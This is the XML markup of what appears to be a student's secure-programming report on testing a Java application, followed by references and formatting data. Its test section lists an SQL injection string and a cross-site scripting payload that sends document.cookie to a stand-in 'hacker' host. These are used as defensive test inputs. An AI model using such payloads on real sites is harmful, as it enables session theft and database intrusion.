        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>include evidence of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> using secure testing techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1616E8" w14:textId="4E5379D1" w:rsidR="00A363CE" w:rsidRPr="00A363CE" w:rsidRDefault="00846F63" w:rsidP="00023439">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A363CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing for SQL Injection: </w:t>
      </w:r>
      <w:r w:rsidR="00196628">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Doesn’t work (beneficial)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3787DCDF" w14:textId="2A0FB2E1" w:rsidR="00846F63" w:rsidRPr="00A363CE" w:rsidRDefault="00A363CE" w:rsidP="00023439">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A363CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>0 OR 1=1</w:t>
      </w:r>
      <w:r w:rsidR="00196628">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>(beneficial)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9D6974" w14:textId="1C728713" w:rsidR="00A363CE" w:rsidRPr="00A363CE" w:rsidRDefault="00A363CE" w:rsidP="00023439">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A363CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Tested for cross site scripting: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B49CB2" w14:textId="38BAF751" w:rsidR="00A363CE" w:rsidRPr="00A363CE" w:rsidRDefault="00A363CE" w:rsidP="00023439">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A363CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>&lt;SCRIPT&gt;var+img=new+Image(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A363CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>);img.src</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A363CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>="http://hacker/"%20+%20document.cookie;&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B08C9B" w14:textId="16FA4720" w:rsidR="00846F63" w:rsidRDefault="00846F63" w:rsidP="00023439">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="099C7E97" wp14:editId="1A004240">
            <wp:extent cx="3543300" cy="253262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610" cy="2534278"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A87611B" w14:textId="7B7673DA" w:rsidR="00846F63" w:rsidRDefault="00846F63" w:rsidP="00023439">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4677915D" wp14:editId="0A6D8440">
            <wp:extent cx="3589020" cy="1720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7180" cy="1728724"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A476E0E" w14:textId="7155CC4D" w:rsidR="00A363CE" w:rsidRDefault="00A363CE" w:rsidP="00023439">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="038B8F2D" w14:textId="1C0065BA" w:rsidR="00A363CE" w:rsidRDefault="00A363CE" w:rsidP="00023439">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="564B42C5" w14:textId="204D743B" w:rsidR="00A363CE" w:rsidRDefault="00A363CE" w:rsidP="00023439">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5670CE27" w14:textId="40A19C63" w:rsidR="00A363CE" w:rsidRDefault="00A363CE" w:rsidP="00023439">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12F9633A" w14:textId="046052B5" w:rsidR="00A363CE" w:rsidRDefault="00A363CE" w:rsidP="00023439">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0217188C" w14:textId="4841BC3A" w:rsidR="00A363CE" w:rsidRDefault="00A363CE" w:rsidP="00023439">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Inputs validation testing – Working fine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48942CE5" w14:textId="737531B2" w:rsidR="00846F63" w:rsidRDefault="00846F63" w:rsidP="00023439">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CBB63B2" wp14:editId="314D969C">
            <wp:extent cx="3185160" cy="255102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9617" cy="2554591"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="720073A5" w14:textId="1852398F" w:rsidR="00196628" w:rsidRDefault="00196628" w:rsidP="00023439">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">Checks for passwords when logging in. – Works </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>good</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3F57ADB8" w14:textId="2576CF9C" w:rsidR="00846F63" w:rsidRDefault="00846F63" w:rsidP="00023439">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EE1A31F" wp14:editId="19E5B0B7">
            <wp:extent cx="2948940" cy="2676548"/>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496" cy="2680683"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A075109" w14:textId="4B22D8DB" w:rsidR="00196628" w:rsidRDefault="00196628" w:rsidP="00023439">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>Validation – requests image before doing anything.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2591DC95" w14:textId="4B8DCC67" w:rsidR="00846F63" w:rsidRDefault="00846F63" w:rsidP="00023439">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65C5E10A" wp14:editId="24FCA984">
            <wp:extent cx="2920365" cy="19125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6624" cy="1923154"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E75872" w14:textId="44F2DA38" w:rsidR="00E937D5" w:rsidRDefault="00E937D5" w:rsidP="00023439">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Numerical values are accepted – </w:t>
      </w:r>
      <w:r w:rsidR="0099432B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>alphabet</w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> letters are not!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E344056" w14:textId="151220DC" w:rsidR="00E937D5" w:rsidRPr="00023439" w:rsidRDefault="00E937D5" w:rsidP="00023439">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73835702" wp14:editId="193619F0">
            <wp:extent cx="4085590" cy="1929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7194" cy="1934660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDDBAB7" w14:textId="77777777" w:rsidR="00DA63FD" w:rsidRDefault="00DA63FD" w:rsidP="00FE1E78"/>
    <w:p w14:paraId="7150DAF0" w14:textId="77777777" w:rsidR="00E706B2" w:rsidRPr="00E706B2" w:rsidRDefault="00E706B2" w:rsidP="00E706B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45EC2EEF" w14:textId="77777777" w:rsidR="00FE1E78" w:rsidRDefault="00FE1E78" w:rsidP="00DA63FD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA63FD">
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F64B78E" w14:textId="162D0DBC" w:rsidR="00846F63" w:rsidRDefault="00846F63" w:rsidP="00846F63">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:t xml:space="preserve">DaniWeb. (2018). Validate String from user input - </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:t>Help!.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:t xml:space="preserve"> [online] Available at: https://www.daniweb.com/programming/software-development/threads/411455/validate-string-from-user-input-help [Accessed 12 Apr. 2018].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBD889C" w14:textId="5974A25D" w:rsidR="00846F63" w:rsidRDefault="00846F63" w:rsidP="00846F63">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:t>Roseindia.net. (2018). Java swing store the encrypted password into database. [online] Available at: https://www.roseindia.net/tutorial/java/core/storeEncryptedPassword.html [Accessed 12 Apr. 2018].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2776C046" w14:textId="6A85A50C" w:rsidR="00846F63" w:rsidRDefault="00846F63" w:rsidP="00846F63">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:t>Saleem Gul, T. (2018). Introduction to GUI Building - NetBeans IDE Tutorial. [online] Netbeans.org. Available at: https://netbeans.org/kb/docs/java/gui-functionality.html?print=yes#Exercise_3 [Accessed 12 Apr. 2018].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5033B25A" w14:textId="2419A057" w:rsidR="00846F63" w:rsidRDefault="00846F63" w:rsidP="00846F63">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:t xml:space="preserve">Tutorials, A., Boot, S., 8, J., Questions, I., Us, W., Gupta, L., Gupta, L., Gupta, L., Sarkar, D., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:t>Pls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:t xml:space="preserve">, N., Li, L., Nadeem, M., Gupta, L., Nadeem, M., Gupta, L., Nadeem, M., Nadeem, M., Gupta, L., Nadeem, M., Gupta, L., Gupta, L., Rochester, L., Gupta, L., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:t>walter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:t xml:space="preserve">, A., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:t>Groulx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:t xml:space="preserve">, F. and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:t>nayak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:t xml:space="preserve">, h. (2018). Generate Secure Password </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:t>Hash :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:t xml:space="preserve"> MD5, SHA, PBKDF2, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:t>BCrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Examples - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:t>HowToDoInJava</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:t xml:space="preserve">. [online] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:t>HowToDoInJava</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:t>. Available at: https://howtodoinjava.com/security/how-to-generate-secure-password-hash-md5-sha-pbkdf2-bcrypt-examples/ [Accessed 12 Apr. 2018].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E323109" w14:textId="0629016D" w:rsidR="00846F63" w:rsidRDefault="00846F63" w:rsidP="00846F63">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:t>Veerasundar.com. (2018). Storing passwords in Java web application by Hashing it. [online] Available at: https://veerasundar.com/blog/2010/09/storing-passwords-in-java-web-application/ [Accessed 12 Apr. 2018].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027FD4D7" w14:textId="76900055" w:rsidR="00C51C09" w:rsidRDefault="00846F63" w:rsidP="00846F63">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:t>YouTube. (2018). Java prog#143. Using Regular Expressions in Java. [online] Available at: https://www.youtube.com/watch?v=4XZdpwchIt4 [Accessed 12 Apr. 2018].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D14F315" w14:textId="77777777" w:rsidR="00C06D09" w:rsidRPr="00DA63FD" w:rsidRDefault="00C06D09" w:rsidP="00DA63FD">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27BE5AC2" w14:textId="77777777" w:rsidR="00FE1E78" w:rsidRDefault="00FE1E78" w:rsidP="00FE1E78">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CAC9746" w14:textId="77777777" w:rsidR="00DD540D" w:rsidRPr="0058245F" w:rsidRDefault="00DD540D" w:rsidP="00DD540D">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00DD540D" w:rsidRPr="0058245F" w:rsidSect="00D30279">
      <w:headerReference w:type="default" r:id="rId25"/>
      <w:footerReference w:type="default" r:id="rId26"/>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93453" w14:textId="77777777" w:rsidR="00BB1066" w:rsidRDefault="00BB1066" w:rsidP="00D37E61">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="75DADC91" w14:textId="77777777" w:rsidR="00BB1066" w:rsidRDefault="00BB1066"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1B72" w14:textId="77777777"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023439">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>1</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023439">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>3</w:t>
    </w:r>
    <w:r w:rsidRPr="00D37E61">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="7BA7BC3A" w14:textId="77777777" w:rsidR="009B4565" w:rsidRDefault="009B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09C5" w14:textId="77777777" w:rsidR="00BB1066" w:rsidRDefault="00BB1066" w:rsidP="00D37E61">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="160A23DD" w14:textId="77777777" w:rsidR="00BB1066" w:rsidRDefault="00BB1066" w:rsidP="00D3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B620" w14:textId="77777777" w:rsidR="005278C8" w:rsidRDefault="00DD3C3A" w:rsidP="00D31726">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>Project Title</w:t>
    </w:r>
    <w:r w:rsidR="005278C8" w:rsidRPr="00B368E5">
      <w:rPr>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r w:rsidR="005278C8" w:rsidRPr="00B368E5">
      <w:rPr>
        <w:b/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t xml:space="preserve">                                   </w:t>
    </w:r>
    <w:r w:rsidR="00CB5411">
      <w:rPr>
        <w:b/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t xml:space="preserve">                                                                 </w:t>
    </w:r>
    <w:r w:rsidR="007664CE">
      <w:rPr>
        <w:b/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t xml:space="preserve">Advanced </w:t>
    </w:r>
    <w:r w:rsidR="00D31726">
      <w:rPr>
        <w:b/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t>Secure Programming</w:t>
    </w:r>
    <w:r w:rsidR="005278C8" w:rsidRPr="00B368E5">
      <w:rPr>
        <w:b/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidR="005278C8" w:rsidRPr="00B368E5">
      <w:rPr>
        <w:b/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidR="005278C8" w:rsidRPr="00B368E5">
      <w:rPr>
        <w:b/>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82266"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6C3A50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666077"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="24AA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1E6351"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="320416B2"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:color w:val="4F81BD" w:themeColor="accent1"/>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3" w15:restartNumberingAfterBreak="0">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5DD3DC2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D2FE12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FC00C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="320416B2"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:color w:val="4F81BD" w:themeColor="accent1"/>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7" w15:restartNumberingAfterBreak="0">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8"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="16"/>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B1"/>
    <w:rsid w:val="00003FA6"/>
    <w:rsid w:val="000060FD"/>
    <w:rsid w:val="00011D54"/>
    <w:rsid w:val="00023439"/>
    <w:rsid w:val="0002577C"/>
    <w:rsid w:val="00041B29"/>
    <w:rsid w:val="00050F50"/>
    <w:rsid w:val="00051521"/>
